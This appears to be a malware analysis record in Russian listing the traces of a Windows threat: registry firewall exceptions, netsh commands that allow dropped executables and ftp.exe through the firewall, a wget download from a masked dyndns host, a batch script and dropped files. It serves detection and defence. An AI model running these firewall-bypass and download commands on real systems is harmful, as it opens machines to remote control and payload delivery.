Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%TEMP%\1.tmp\UPnPPW.exe' = '%TEMP%\1.tmp\UPnPPW.exe:*:Enabled:UPnPPW.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%TEMP%\1.tmp\BaUPnP.exe' = '%TEMP%\1.tmp\BaUPnP.exe:*:Enabled:BaUPnP.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\ftp.exe' = '<SYSTEM32>\ftp.exe:*:Enabled:ftp.exe'
- %TEMP%\1.tmp\wget.exe http://ch####p.dyndns.org
- <SYSTEM32>\netsh.exe firewall add allowedprogram "%TEMP%\1.tmp\BaUPnP.exe" BaUPnP.exe
- <SYSTEM32>\netsh.exe firewall add allowedprogram "%TEMP%\1.tmp\UPnPPW.exe" UPnPPW.exe
- <SYSTEM32>\netsh.exe firewall add allowedprogram "%WINDIR%\SysWOW64\ftp.exe" ftp_64.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\ips.bat" "
- <SYSTEM32>\netsh.exe firewall add allowedprogram "<SYSTEM32>\ftp.exe" ftp.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\BaUPnP.exe
- %TEMP%\1.tmp\index.html
- %TEMP%\1.tmp\ips.bat
- %TEMP%\1.tmp\HTML2TXT.EXE
- %TEMP%\1.tmp\UPnPPW.exe
- 'ch####p.dyndns.org':80
- ch####p.dyndns.org/
- DNS ASK ch####p.dyndns.org